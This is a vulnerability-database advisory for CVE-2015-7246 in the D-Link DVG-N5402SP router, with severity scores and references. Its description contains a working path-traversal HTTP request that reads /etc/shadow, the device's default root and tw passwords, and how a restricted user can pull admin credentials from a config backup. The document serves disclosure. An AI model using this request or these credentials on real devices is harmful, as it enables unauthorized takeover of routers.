Sign-up

ID

VAR-201704-0219


CVE

CVE-2015-7246


TITLE

D-Link DVG-N5402SP Vulnerabilities in which management access rights are obtained in some firmware

Trust: 0.8

sources: JVNDB: JVNDB-2015-007544

DESCRIPTION

D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 has a default password of root for the root account and tw for the tw account, which makes it easier for remote attackers to obtain administrative access. The D-Link DVG-N5402SP is a wireless router product from D-Link for voice, fax and shared wireless Internet over IP networks. A security vulnerability exists in D-LinkDVG-N5402SP that originated from a hard-coded certificate used by the program. An attacker could exploit this vulnerability to gain administrator control. DLink DVG­N5402SP is prone to multiple security vulnerabilities. Attackers can leverage these issues to bypass the authentication mechanism and gain access to the vulnerable device, use directory-traversal characters ('../') and obtain sensitive information; other attacks are also possible. DLink DVG­N5402SP File Path Traversal, Weak Credentials Management, and Sensitive Info Leakage Vulnerabilities *Timelines* Reported to CERT + Vendor: August 2015 Dlink released beta release: Oct 23, 2015 New fix release: MD5 (GRNV6.1U23J-83-DL-R1B114-SG_Normal.EN.img) = 04fd8b901e9f297a4cdbea803a9a43cb No public disclosure till date - Dlink waiting for Service providers to ask for new release + CERT opted out *Vulnerable Models, Firmware, Hardware versions* DVG­N5402SP Web Management Model Name : GPN2.4P21­C­CN Firmware Version : W1000CN­00 Firmware Version :W1000CN­03 Firmware Version :W2000EN­00 Hardware Platform :ZS Hardware Version :Gpn2.4P21­C_WIFI­V0.05 Device can be managed through three users: 1. super ­ full privileges 2. admin ­ full privileges 3. support ­ restricted user *1. Path traversal* Arbitrary files can be read off of the device file system. *CVE-ID*: CVE-2015-7245 *HTTP Request * POST /cgi­bin/webproc HTTP/1.1 Host: <IP>:8080 User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept­Language: en­US,en;q=0.5 Accept­Encoding: gzip, deflate Referer: http://<IP>:8080/cgi­bin/webproc Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super Connection: keep­alive Content­Type: application/x­www­form­urlencoded Content­Length: 223 getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var% &obj­action=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh *HTTP Response* HTTP/1.0 200 OK pstVal­>name:getpage; pstVal­>value:html/main.html pstVal­>name:getpage; pstVal­>value:html/index.html pstVal­>name:errorpage; pstVal­>value:../../../../../../../../../../../etc/shadow pstVal­>name:var:menu; pstVal­>value:setup pstVal­>name:var:page; pstVal­>value:connected pstVal­>name:var:subpage; pstVal­>value:­ pstVal­>name:obj­action; pstVal­>value:auth pstVal­>name::username; pstVal­>value:super pstVal­>name::password; pstVal­>value:super pstVal­>name::action; pstVal­>value:login pstVal­>name::sessionid; pstVal­>value:1ac5da6b Connection: close Content­type: text/html Pragma: no­cache Cache­Control: no­cache set­cookie: sessionid=1ac5da6b; expires=Fri, 31­Dec­9999 23:59:59 GMT; path=/ #root:<hash_redacted>:13796:0:99999:7::: root:<hash_redacted>:13796:0:99999:7::: #tw:<hash_redacted>:13796:0:99999:7::: #tw:<hash_redacted>:13796:0:99999:7::: *2. Use of Default, Hard­Coded Credentials**CVE-ID*: CVE-2015-7246 The device has two system user accounts configured with default passwords (root:root, tw:tw). Login ­ tw ­ is not active though. Anyone could use the default password to gain administrative control through the Telnet service of the system (when enabled) leading to integrity, loss of confidentiality, or loss of availability. *3.Sensitive info leakage via device running configuration backup * *CVE-ID*: CVE-2015-7247 Usernames, Passwords, keys, values and web account hashes (super & admin) are stored in clear­text and not masked. It is noted that restricted 'support' user may also access this config backup file from the portal directly, gather clear-text admin creds, and gain full, unauthorized access to the device. -- Best Regards, Karn Ganeshen ipositivesecurity.blogspot.in

Trust: 2.7

sources: NVD: CVE-2015-7246 // JVNDB: JVNDB-2015-007544 // CNVD: CNVD-2016-01163 // BID: 82754 // VULHUB: VHN-85207 // VULMON: CVE-2015-7246 // PACKETSTORM: 135590

IOT TAXONOMY

category:['IoT', 'Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2016-01163

AFFECTED PRODUCTS

vendor:d linkmodel:dvg-n5402spscope:eqversion:w1000cn-00

Trust: 2.4

vendor:d linkmodel:dvg-n5402spscope:eqversion:w1000cn-03

Trust: 2.4

vendor:d linkmodel:dvg-n5402spscope:eqversion:w2000en-00

Trust: 2.4

vendor:d linkmodel:dvg\303\202\302\255n5402spscope: - version: -

Trust: 0.6

sources: CNVD: CNVD-2016-01163 // JVNDB: JVNDB-2015-007544 // CNNVD: CNNVD-201602-371 // NVD: CVE-2015-7246

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2015-7246
value: CRITICAL

Trust: 1.0

NVD: CVE-2015-7246
value: CRITICAL

Trust: 0.8

CNVD: CNVD-2016-01163
value: HIGH

Trust: 0.6

CNNVD: CNNVD-201602-371
value: CRITICAL

Trust: 0.6

VULHUB: VHN-85207
value: HIGH

Trust: 0.1

VULMON: CVE-2015-7246
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2015-7246
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

CNVD: CNVD-2016-01163
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-85207
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2015-7246
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.0

Trust: 1.8

sources: CNVD: CNVD-2016-01163 // VULHUB: VHN-85207 // VULMON: CVE-2015-7246 // JVNDB: JVNDB-2015-007544 // CNNVD: CNNVD-201602-371 // NVD: CVE-2015-7246

PROBLEMTYPE DATA

problemtype:CWE-798

Trust: 1.9

sources: VULHUB: VHN-85207 // JVNDB: JVNDB-2015-007544 // NVD: CVE-2015-7246

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201602-371

TYPE

trust management problem

Trust: 0.6

sources: CNNVD: CNNVD-201602-371

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2015-007544

EXPLOIT AVAILABILITY
sources:
            
            
            VULHUB: VHN-85207 // 
            
            
            
            VULMON: CVE-2015-7246

PATCH
title:Top Pageurl:http://www.dlink.com/uk/en
Trust: 0.8
sources:
            
            
            JVNDB: JVNDB-2015-007544

EXTERNAL IDS
db:NVDid:CVE-2015-7246
Trust: 3.6
db:PACKETSTORMid:135590
Trust: 2.7
db:EXPLOIT-DBid:39409
Trust: 1.8
db:BIDid:82754
Trust: 1.0
db:JVNDBid:JVNDB-2015-007544
Trust: 0.8
db:CNNVDid:CNNVD-201602-371
Trust: 0.7
db:CNVDid:CNVD-2016-01163
Trust: 0.6
db:VULHUBid:VHN-85207
Trust: 0.1
db:VULMONid:CVE-2015-7246
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2016-01163 // 
            
            
            
            VULHUB: VHN-85207 // 
            
            
            
            VULMON: CVE-2015-7246 // 
            
            
            
            BID: 82754 // 
            
            
            
            JVNDB: JVNDB-2015-007544 // 
            
            
            
            PACKETSTORM: 135590 // 
            
            
            
            CNNVD: CNNVD-201602-371 // 
            
            
            
            NVD: CVE-2015-7246

REFERENCES
url:http://packetstormsecurity.com/files/135590/d-link-dvg-n5402sp-path-traversal-information-disclosure.html
Trust: 2.7
url:http://seclists.org/fulldisclosure/2016/feb/24
Trust: 2.1
url:https://www.exploit-db.com/exploits/39409/
Trust: 1.9
url:https://nvd.nist.gov/vuln/detail/cve-2015-7246
Trust: 0.9
url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7246
Trust: 0.8
url:http://www.securityfocus.com/bid/82754
Trust: 0.7
url:http://www.dlink.co.in/
Trust: 0.3
url:https://cwe.mitre.org/data/definitions/798.html
Trust: 0.1
url:https://nvd.nist.gov
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2015-7245
Trust: 0.1
url:http://<ip>:8080/cgi­bin/webproc
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2015-7247
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2016-01163 // 
            
            
            
            VULHUB: VHN-85207 // 
            
            
            
            VULMON: CVE-2015-7246 // 
            
            
            
            BID: 82754 // 
            
            
            
            JVNDB: JVNDB-2015-007544 // 
            
            
            
            PACKETSTORM: 135590 // 
            
            
            
            CNNVD: CNNVD-201602-371 // 
            
            
            
            NVD: CVE-2015-7246

CREDITS
Karn Ganeshen
Trust: 1.0
sources:
            
            
            BID: 82754 // 
            
            
            
            PACKETSTORM: 135590 // 
            
            
            
            CNNVD: CNNVD-201602-371

SOURCES
db:CNVDid:CNVD-2016-01163
db:VULHUBid:VHN-85207
db:VULMONid:CVE-2015-7246
db:BIDid:82754
db:JVNDBid:JVNDB-2015-007544
db:PACKETSTORMid:135590
db:CNNVDid:CNNVD-201602-371
db:NVDid:CVE-2015-7246

LAST UPDATE DATE
2025-04-20T23:13:14.300000+00:00

SOURCES UPDATE DATE
db:CNVDid:CNVD-2016-01163date:2016-02-22T00:00:00
db:VULHUBid:VHN-85207date:2017-04-28T00:00:00
db:VULMONid:CVE-2015-7246date:2017-04-28T00:00:00
db:BIDid:82754date:2016-07-05T21:22:00
db:JVNDBid:JVNDB-2015-007544date:2017-05-26T00:00:00
db:CNNVDid:CNNVD-201602-371date:2023-04-27T00:00:00
db:NVDid:CVE-2015-7246date:2025-04-20T01:37:25.860

SOURCES RELEASE DATE
db:CNVDid:CNVD-2016-01163date:2016-02-22T00:00:00
db:VULHUBid:VHN-85207date:2017-04-24T00:00:00
db:VULMONid:CVE-2015-7246date:2017-04-24T00:00:00
db:BIDid:82754date:2016-02-03T00:00:00
db:JVNDBid:JVNDB-2015-007544date:2017-05-26T00:00:00
db:PACKETSTORMid:135590date:2016-02-03T20:32:22
db:CNNVDid:CNNVD-201602-371date:2016-02-19T00:00:00
db:NVDid:CVE-2015-7246date:2017-04-24T18:59:00.210